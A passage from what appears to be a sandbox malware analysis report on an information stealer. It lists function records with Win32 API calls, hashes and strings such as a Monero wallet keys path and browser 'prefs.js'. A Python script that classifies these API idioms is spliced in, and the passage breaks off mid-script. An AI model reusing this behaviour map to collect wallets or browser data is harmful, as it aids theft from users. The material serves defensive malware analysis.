                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: c2cf5ba99d110b258ce0ef06a2c99ec38fa69c5c7c8c97db508d2821988356a9
                              • Instruction ID: 5eb3ed55a6817a81e3d6397d9cfe6e2a2239174db7da392885ea8859ba7a7061
                              • Opcode Fuzzy Hash: c2cf5ba99d110b258ce0ef06a2c99ec38fa69c5c7c8c97db508d2821988356a9
                              • Instruction Fuzzy Hash: AE5146B2900218ABCB25EBB4DC85FEE737CBB54700F404598F659A7040EB75EB899F91
                              APIs
                              • wsprintfA.USER32 ref: 0032ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0032ED55
                              • StrCmpCA.SHLWAPI(?,00341538), ref: 0032EDAB
                              • StrCmpCA.SHLWAPI(?,0034153C), ref: 0032EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0032F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0032F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: f6fbb233d00c6d155360539b45be41107869bd5baa0e1f670133751515271015
                              • Instruction ID: 1ea20b68e10efea6ff2f86a524e30c767ca9fe4ab3c5dc843a3555b2970edfbc
                              • Opcode Fuzzy Hash: f6fbb233d00c6d155360539b45be41107869bd5baa0e1f670133751515271015
                              • Instruction Fuzzy Hash: 39E16572811618AADB56FB60DCD2EEE777CAF54300F4041D9B44A6A052EF306F8ADF51
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003415B8,00340D96), ref: 0032F71E
                              • StrCmpCA.SHLWAPI(?,003415BC), ref: 0032F76F
                              • StrCmpCA.SHLWAPI(?,003415C0), ref: 0032F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0032FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0032FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 9bc89f6eca6a29092360c1ce0cff07016e2e9a57b259f23652b0b6f7ce1fcef2
                              • Instruction ID: c420e1c7eebdec4961fbf0af64846ca667bd4208066dfae6aea03a91e68b7224
                              • Opcode Fuzzy Hash: 9bc89f6eca6a29092360c1ce0cff07016e2e9a57b259f23652b0b6f7ce1fcef2
                              • Instruction Fuzzy Hash: 08B15171900618ABCB26FF64DCD6AEE7778AF54300F4081A8E44A9F141EF346B49DF92
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0034510C,?,?,?,003451B4,?,?,00000000,?,00000000), ref: 00321923
                              • StrCmpCA.SHLWAPI(?,0034525C), ref: 00321973
                              • StrCmpCA.SHLWAPI(?,00345304), ref: 00321989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00321D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00321DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00321E20
                              • FindClose.KERNEL32(000000FF), ref: 00321E32
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: de84090e3dd9840cc731b3392caee21ee03d1571ab73cf4f4ffd9e74e19f8fd3
                              • Instruction ID: 3549a3f7b6e97e23b4d1f0c7bb6316c7f53bc422a95b581fa0fd3d1dedce9e1d
                              • Opcode Fuzzy Hash: de84090e3dd9840cc731b3392caee21ee03d1571ab73cf4f4ffd9e74e19f8fd3
                              • Instruction Fuzzy Hash: EF123F71910618ABCB1AFB60DCD6EEE7778AF54300F404199B14A6E091EF346F89DFA1
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00340C2E), ref: 0032DE5E
                              • StrCmpCA.SHLWAPI(?,003414C8), ref: 0032DEAE
                              • StrCmpCA.SHLWAPI(?,003414CC), ref: 0032DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0032E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0032E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 0a4a38754ee9137f87b802e2486bb406b96f7204e5b3eeb47f471106bc5bd298
                              • Instruction ID: a7a518a200001bd7cb665231b75fca8c31e87ac485f960320ae4266a49d76c47
                              • Opcode Fuzzy Hash: 0a4a38754ee9137f87b802e2486bb406b96f7204e5b3eeb47f471106bc5bd298
                              • Instruction Fuzzy Hash: CEF1CF71814618AADB17FB60DCD6EEE7778BF14300F8141D9A04A6A091EF346F8ADF52
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003414B0,00340C2A), ref: 0032DAEB
                              • StrCmpCA.SHLWAPI(?,003414B4), ref: 0032DB33
                              • StrCmpCA.SHLWAPI(?,003414B8), ref: 0032DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0032DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0032DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: d671df6b75ef0e0f2939110bbb54e95d722ff01a357b7050a85aae9dd29dc71d
                              • Instruction ID: b1a51921c2921da26dc804ef69c3819c66ab944fd95c6e66bace71210e4ffec2
                              • Opcode Fuzzy Hash: d671df6b75ef0e0f2939110bbb54e95d722ff01a357b7050a85aae9dd29dc71d
                              • Instruction Fuzzy Hash: 23915572900514A7CB16FBB4ECD69ED777CAF94300F408558F94A9F181EE34AB498B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 4%$v$E,:$IP?$_Mvg$mt?}$z@S${oso$q
                              • API String ID: 0-1417705900
                              • Opcode ID: 18af393bde6e25a49fa32243555347213ce128299c91864e731773224f14bc6d
                              • Instruction ID: d8ec8f3b30f52b1ce93f6a932aa3cd8110241a8f4e505c5632fe8553115fba0e
                              • Opcode Fuzzy Hash: 18af393bde6e25a49fa32243555347213ce128299c91864e731773224f14bc6d
                              • Instruction Fuzzy Hash: 3AB2F5F390C2009FE3046E29EC8567ABBE5EF94720F1A493DEAC4C7744EA3598158797
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,003405AF), ref: 00337BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00337BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00337C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00337C62
                              • LocalFree.KERNEL32(00000000), ref: 00337D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 29e6aba988284635bc6bfada7e14755b0437ddbefac3295b769851bdfbb48000
                              • Instruction ID: bcb8d806c4d65a581d152d67236be5e9f6cc8d6abd2e0eae8b9be187f79b7194
                              • Opcode Fuzzy Hash: 29e6aba988284635bc6bfada7e14755b0437ddbefac3295b769851bdfbb48000
                              • Instruction Fuzzy Hash: C4416C71940218ABCB25DB94DCC9BEEB7B8FF44700F204199E0096A180DB742F85CFA1
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00340D73), ref: 0032E4A2
                              • StrCmpCA.SHLWAPI(?,003414F8), ref: 0032E4F2
                              • StrCmpCA.SHLWAPI(?,003414FC), ref: 0032E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0032EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: a43578503804d378465782333618652cb7272843aee4cd8887dba554fc71c106
                              • Instruction ID: b845e88067c7575adc1f018cd50b17d5ef159339af746ab96151352f8a0bde73
                              • Opcode Fuzzy Hash: a43578503804d378465782333618652cb7272843aee4cd8887dba554fc71c106
                              • Instruction Fuzzy Hash: A5125371910618AADB16FB60DCD6EED7378AF54300F4041A8F54AAE191EF346F89CF92
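The four FindFirstFileA/FindNextFileA records above, the GetKeyboardLayoutList/GetLocaleInfoA record, and the CryptStringToBinaryA/LocalAlloc record further down in this section each show a recognisable Win32 idiom, but the report only lists the raw calls. The following Python is an added example, not part of the Joe Sandbox report and not code from the Stealc sample: it parses the report's "APIs" bullets and names the idiom each record exhibits (a directory walk with a name filter, copy-then-delete collection, a keyboard-layout language check, and the two-call CryptStringToBinaryA base64 decode). The SDK constant values are taken from the Windows headers; reading the paired StrCmpCA as a "." and ".." filter is an assumption, since the report does not show the compared strings; the three sample records are copied from this page.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Windows SDK constants (values from wincrypt.h, winnls.h and minwinbase.h).
CRYPT_STRING_BASE64 = 0x00000001   # dwFlags seen in both CryptStringToBinaryA calls
LOCALE_SLANGUAGE = 0x00000002      # LCType seen in GetLocaleInfoA: localized language name
LPTR = 0x00000040                  # LocalAlloc flags: LMEM_FIXED | LMEM_ZEROINIT

# One "APIs" bullet as the report prints it; "Part of subcall function <addr>:"
# marks calls made by a shared helper rather than by the function itself.
_API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int                       # address of the call site
    subcall: Optional[int] = None  # helper address for "Part of subcall" lines


def parse_api_lines(text: str) -> list:
    """Turn the APIs bullets of one function record into Call objects."""
    calls = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def literal_args(calls) -> list:
    """Arguments the sandbox resolved to a string (not a pointer value or '?')."""
    seen = []
    for c in calls:
        for a in c.args:
            if a and a != "?" and not _HEX32.match(a) and a not in seen:
                seen.append(a)
    return seen


def _arg(c: Call, i: int) -> int:
    """Argument i as an integer, or -1 when it is '?' or a string."""
    try:
        return int(c.args[i], 16)
    except (IndexError, ValueError):
        return -1


def classify(calls) -> list:
    """Name the API idioms visible in a record's direct (non-subcall) calls."""
    own = [c for c in calls if c.subcall is None]
    seq = [c.api for c in own]
    tags = []
    if "FindFirstFileA" in seq and "FindNextFileA" in seq:
        tags.append("directory walk")
        # Two StrCmpCA right after FindFirstFileA is consistent with skipping
        # "." and ".." before recursing (assumption: operands are not shown).
        if seq.count("StrCmpCA") >= 2:
            tags.append("name filter before recursion")
        if "FindClose" not in seq:
            tags.append("no FindClose observed")
    if "CopyFileA" in seq and "DeleteFileA" in seq:
        tags.append("copy-then-delete collection")
    if seq.count("GetKeyboardLayoutList") >= 2:   # size query, then fill the list
        loc = [c for c in own if c.api == "GetLocaleInfoA"]
        if loc and _arg(loc[0], 1) == LOCALE_SLANGUAGE:
            tags.append("keyboard-layout language check")
    crypt = [c for c in own if c.api == "CryptStringToBinaryA"]
    # First call with dwFlags=CRYPT_STRING_BASE64 and pbBinary=NULL only asks
    # for the output size; a buffer is allocated and the second call decodes.
    if len(crypt) >= 2 and _arg(crypt[0], 2) == CRYPT_STRING_BASE64 and _arg(crypt[0], 3) == 0:
        alloc = any(c.api == "LocalAlloc" and _arg(c, 0) == LPTR for c in own)
        tags.append("base64 decode, two-call size query" + (" + LocalAlloc(LPTR)" if alloc else ""))
    return tags


# Sample input: the APIs bullets of three records on this page, copied verbatim.
RECORD_WALK = r"""
  • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0034510C,?,?,?,003451B4,?,?,00000000,?,00000000), ref: 00321923
• StrCmpCA.SHLWAPI(?,0034525C), ref: 00321973
• StrCmpCA.SHLWAPI(?,00345304), ref: 00321989
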